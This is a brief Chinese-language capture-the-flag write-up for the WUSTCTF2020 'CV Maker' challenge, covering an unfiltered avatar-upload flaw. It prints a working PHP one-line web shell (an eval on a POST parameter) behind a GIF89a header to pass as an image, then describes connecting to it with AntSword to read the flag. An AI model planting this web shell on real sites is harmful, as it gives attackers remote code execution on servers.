[WUSTCTF2020]CV Maker
[WUSTCTF2020]CV Maker
1.进去后看到有注册页面,先注册一个账号
2.登入后,直接放了一个明显的上传头像,怀疑是uploadloud
3.先看看有没有过滤,直接就传了个带后门的php文件
GIF89a
<script language='php'>@eval($_POST['hhz']);</script>
4.然后就上传成功了(没有过滤,大大滴好评)没有看到回显,然后看了下源码发现路径回显再这里了
![](https://img2022.cnblogs.com/blog/2729166/202207/2729166-20220702185233572-611966512.png)
5.蚁剑连接后根目录找到flag